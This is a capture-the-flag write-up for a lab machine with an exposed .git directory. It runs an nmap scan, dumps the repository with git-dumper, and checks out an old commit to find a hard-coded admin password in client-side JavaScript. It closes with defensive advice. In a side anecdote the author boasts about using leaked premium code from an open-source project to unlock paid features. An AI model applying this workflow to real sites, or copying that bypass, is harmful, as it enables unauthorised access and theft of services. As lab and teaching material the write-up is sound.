Git-Happens

Target Details

IP Address: 10.10.49.172

Scan Services

• Run nmap scan

$ nmap -sCV -Pn -oN nmap.txt [TARGET_IP]
$ cat nmap.txt
Nmap scan report for [TARGET_IP]
Host is up (0.40s latency).
Not shown: 999 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
80/tcp open  http    nginx 1.14.0 (Ubuntu)
|_http-title: Super Awesome Site!
|_http-server-header: nginx/1.14.0 (Ubuntu)
| http-git: 
|   [TARGET_IP]:80/.git/
|     Git repository found!
|_    Repository description: Unnamed repository; edit this file 'description' to name the...
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Apr 14 22:04:47 2023 -- 1 IP address (1 host up) scanned in 118.95 seconds

• Services

Service	PORT	Comments
HTTP	80	exposed .git directory with listing enabled

Exposed .git directory

Clone git directory to local machine

• Install git-dumper python tool

pip install git-dumper

• Create directory for repo and change dir

mdkir git-repo && cd git-repo

• Download git files

$ git-dumper http://10.10.49.172/.git/ .
[-] Testing http://10.10.49.172/.git/HEAD [200]
[-] Testing http://10.10.49.172/.git/ [200]
[-] Fetching .git recursively
[-] Fetching http://10.10.49.172/.git/ [200]
[-] Fetching http://10.10.49.172/.gitignore [404]
[-] http://10.10.49.172/.gitignore responded with status code 404
[-] Fetching http://10.10.49.172/.git/description [200]
[-] Fetching http://10.10.49.172/.git/index [200]
[-] Fetching http://10.10.49.172/.git/hooks/ [200]
[-] Fetching http://10.10.49.172/.git/refs/ [200]
[-] Fetching http://10.10.49.172/.git/config [200]
[-] Fetching http://10.10.49.172/.git/branches/ [200]
[-] Fetching http://10.10.49.172/.git/HEAD [200]
....
[-] Fetching http://10.10.49.172/.git/logs/refs/heads/master [200]
[-] Running git checkout .
Updated 7 paths from the index

Looking Through commits

• Check commit logs

$ git log
commit d0b3578a628889f38c0affb1b75457146a4678e5 (HEAD -> master, tag: v1.0)
Author: Adam Bertrand <hydragyrum@gmail.com>
Date:   Thu Jul 23 22:22:16 2020 +0000

    Update .gitlab-ci.yml

commit 77aab78e2624ec9400f9ed3f43a6f0c942eeb82d
Author: Hydragyrum <hydragyrum@gmail.com>
Date:   Fri Jul 24 00:21:25 2020 +0200

    add gitlab-ci config to build docker file.

....


commit 395e087334d613d5e423cdf8f7be27196a360459
Author: Hydragyrum <hydragyrum@gmail.com>
Date:   Thu Jul 23 23:17:43 2020 +0200

    Made the login page, boss!

commit 2f423697bf81fe5956684f66fb6fc6596a1903cc
Author: Adam Bertrand <hydragyrum@gmail.com>
Date:   Mon Jul 20 20:46:28 2020 +0000

    Initial commit

• Found commit hash when login page was created. commit hash: 395e087334d613d5e423cdf8f7be27196a360459

• Change git HEAD to 395e087334d613d5e423cdf8f7be27196a360459 hash

git checkout 395e087334d613d5e423cdf8f7be27196a360459

• List directory files

$ ls
README.md      css            dashboard.html index.html

• We might find hard coded passwords in html page.

$ cat index.html

....
    <script>
      function login() {
        let form = document.getElementById("login-form");
        console.log(form.elements);
        let username = form.elements["username"].value;
        let password = form.elements["password"].value;
        if (
          username === "admin" &&
          password === "{{REDACTED}}"
        ) {
          document.cookie = "login=1";
          window.location.href = "/dashboard.html";
        } else {
          document.getElementById("error").innerHTML =
            "INVALID USERNAME OR PASSWORD!";
        }
      }
    </script>
  </body>
</html> 

• We've found hard coded password in index.html page. Submit password as flag.

Real World Analogy

From one of the open source project. The developers mistakenly commited paid services code block on their community edition git repo. I was able to reverse engineer the code block and avail those premium services 😉 by making changes to the community edition codebase.

Conclusion

That was FUN!!

• If you're gonna hard code credentials on client side, there is always someone who's gonna break the code.

• .git directory shouldn't be accessible to anyone. A minor server misconfiguration will allow attacker to find attack vector and exploit your infra/apps.